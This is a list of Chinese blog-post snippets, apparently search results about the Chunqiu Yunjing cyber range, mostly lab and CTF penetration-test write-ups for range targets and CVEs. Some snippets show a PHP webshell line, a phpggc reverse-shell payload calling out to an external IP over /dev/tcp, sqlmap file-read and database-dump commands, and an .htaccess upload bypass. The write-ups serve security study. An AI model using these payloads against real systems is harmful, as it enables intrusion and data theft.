• 2024-06-22[春秋云镜] Initial
    [春秋云镜]Initial**整套网络环境拓扑:**​​一、打进内网开局一个ip:39.101.184.25,fscan扫一下​​存在thinkphp5.0.23的漏洞,可以rce,我们用工具检测下,然后上传webshell​​然后我们用蚁剑连一下,whoami看一下是www-data权限​​我们在www目录下搜一下flag,没
  • 2024-03-29春秋云镜 CVE-2023-26469
    靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。访问靶场链接查询CVE-2
  • 2024-03-29春秋云镜 CVE-2023-27179
    靶标介绍:GDideesCMSv3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于/_admin/imgdownload.php的filename参数进行利用。访问实验地址通过靶场介绍得知,漏洞通过位于/_admin/imgdownload.php的filename参数进行利用。构造访问目录。http://eci-2zeh4jwpx8
  • 2024-03-21春秋云镜-Initial
    春秋云镜-Initial谨以此篇,记录我初入渗透学习之路。中间有次我frp开多了,直接寄了,所以重新开过靶机,所以外网ip变了一次。冲了15块买三个沙砾,2个半小时独立完成了,虽然也很菜呃呃,第一次学渗透,啥配置都是现搜的wwwww首先fscan开扫:./fscan-h121.89.223.67找到开放的80端口,而
  • 2024-01-10春秋云镜 Hospital WP
    fscan先扫描39.101.178.126:22open39.101.178.126:8080open[*]aliveportslenis:2startvulscan[*]WebTitlehttp://39.101.178.126:8080code:302len:0title:None跳转url:http://39.101.178.126:8080/login;jsessionid=1B14C65F6F2FBDDB6219E0E9C43CCB61[*
  • 2023-12-03投影式AI云镜——电梯演讲
    投影式AI云镜——电梯演讲(软件技术基础第三次作业)这个作业属于哪个课程https://edu.cnblogs.com/campus/zjlg/23rjjsjc这个作业的目标是运用电梯演讲的方式向投资方介绍自己的创新产品姓名+学号陈佳华:2021330301002陈卉:2021330301001视频链接:投影式AI云镜
  • 2023-11-24春秋云镜 Delegation WP
    春秋云镜DelegationWP扫描39.99.129.120:21open39.99.129.120:22open39.99.129.120:80open39.99.129.120:3306open在url后面填上admin进入后台弱口令admin123456踩坑之路:在编辑模板处写马<?=system($_POST[1]);die()?>不能用常规的一句话木马,后面填上die()
  • 2023-11-10春秋云镜 Flarum WP
    春秋云镜FlarumWPadministrator、1chrishttps://www.leavesongs.com/PENETRATION/flarum-rce-tour.html生成反弹shell的payloadphpphpggc-ptar-bMonolog/RCE6system"bash-c'bash-i>&/dev/tcp/114.96.104.240/66660>&1'"根据文章复
  • 2023-11-10春秋云镜 2022网鼎杯半决赛 WP
    春秋云镜2022网鼎杯半决赛fscan扫描39.99.228.107:22open39.99.228.107:80open[*]aliveportslenis:2startvulscan[*]WebTitle:http://39.99.228.107code:200len:39988title:XIAORANG.LAB发现是wordpresswpscan--urlhttp://39.99.228.107/--api-t
  • 2023-11-10春秋云镜 Exchange WP
    春秋云镜ExchangeWPfscan扫描(icmp)Target39.100.160.90isalive[*]Icmpalivehostslenis:139.100.160.90:80open39.100.160.90:8000open39.100.160.90:22open[*]aliveportslenis:3startvulscan[*]WebTitle:http://39.100.160.90code:200l
  • 2023-10-31春秋云镜 Brute4Board WP
    扫描[*]Icmpalivehostslenis:139.99.148.22:22open39.99.148.22:21open39.99.148.22:80open39.99.148.22:6379open[*]aliveportslenis:4startvulscan[*]WebTitle:http://39.99.148.22code:200len:4833title:WelcometoCentOS[+]Redis:3
  • 2023-09-22春秋云镜 - CVE-2022-28060
    VictorCMSv1.0/includes/login.php存在sql注入找到页面的登录框,看介绍应该是post类型的表单注入。上sqlmap用原本的梭发现ctf的那个表是空的,换用--file-read参数从目标中读取文件拿到flag。root@Locklytemp/tmp»sqlmap-rsql.txt--file-read"/flag"--batch
  • 2023-09-22春秋云镜 - CVE-2022-28512
    FantasticBlog(CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞
  • 2023-09-21春秋云镜 - CVE-2022-32991
    靶标介绍:该CMS的welcome.php中存在SQL注入攻击。访问页面,先注册,使用邮箱加密码登录。bp抓包,后台挂上sqlipy然后去测welcome.php,常用的语句都没成功但过一会就有了结果,注入点在eid这个参数,看payload是bool盲注。直接sqlmap一把梭,脱裤。sqlmap-rsql.txt--dbs--batch
  • 2023-07-24春秋云镜靶场系列3
    春秋云镜靶场系列靶场地址https://yunjing.ichunqiu.com/ 第一章.CVE-2022-308871.1.靶标介绍:多语言药房管理系统(MPMS)是用PHP和MySQL开发的,该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,
  • 2023-07-24春秋云镜靶场系列2
    第一章.taoCMSv3.0.2任意文件上传漏洞1.1.描述1.2.复现过程路径:http://eci-2zec1bg9zctph4mkxyr8.cloudeci1.ichunqiu.com:80 弱口令admin/tao登录 在文件管理处,点击.htaccess,在后边添加一句AddTypeapplication/x-httpd-php.jpg意思是将.jpg后缀的文件当作php
  • 2023-07-24春秋云镜靶场系列1
    春秋云镜靶场系列春秋云境.com是永信至诚基于多年来在网络靶场领域的深厚技术及场景积累,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,广泛支撑个人、企业、学校、科研院所等各类社会
  • 2023-04-13腾讯云镜YunJing——Agent定时任务脚本分析
    缘起如果你有台腾讯云主机,会发现默认有个叫YunJing的进程。把它kill掉后,发现一段时间又出现了这是为什么捏?分析定时任务配置文件通过crontab定时任务目录,会发现有个叫yunjing的配置文件。*/30****root/usr/local/qcloud/YunJing/YDCrontab.sh>/dev/null2>&1
  • 2023-03-07春秋云镜-【仿真场景】Brute4Road writeup
    说明Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机
  • 2023-03-07春秋云镜-【仿真场景】Time-writeup
    说明Time是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理
  • 2023-03-07春秋云镜-【仿真场景】Initial writeup
    开启靶机后是一个带着ThinkPHPicon的登陆界面,直接测试一下存在5.0.23RCE打一下,PHP-7.4.3的环境,看一下disable_functionspcntl_alarm,pcntl_fork,pcntl_waitpid,pcnt
  • 2023-03-07春秋云镜-【仿真场景】Exchange writeup
    0x00IntroOSCP渗透风格,脱离C2和MSF之类的工具Box难度不高 0x01InfoTag:JDBC,Exchange,NTLM,CoerceAuthentication,DCSync 0x02ReconTargetexternalIP39.98.
  • 2023-03-07春秋云镜-【仿真场景】Spoofing writeup
    0x01–InfoTag:Tomcat,NTLM,WebClient,CoerceAuthentication,noPac0x02–ReconTargetexternalip47.92.146.66NmapresultsFocusonport8009(ajp),意味着是tomcat
  • 2023-02-22春秋云镜-CVE-2022-30887
    春秋云镜-CVE-2022-30887多语言药房管理系统(MPMS)是用PHP和MySQL开发的,该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于
  • 2023-01-22春秋云镜CVE-2022-25101
    一.信息收集及漏洞利用打开靶场,显示界面如下   尝试访问靶场描述的路径,返回404,于是开始路径爆破,返回如下 发现有跳转登录页面,访问/admin/start/index.php,出现登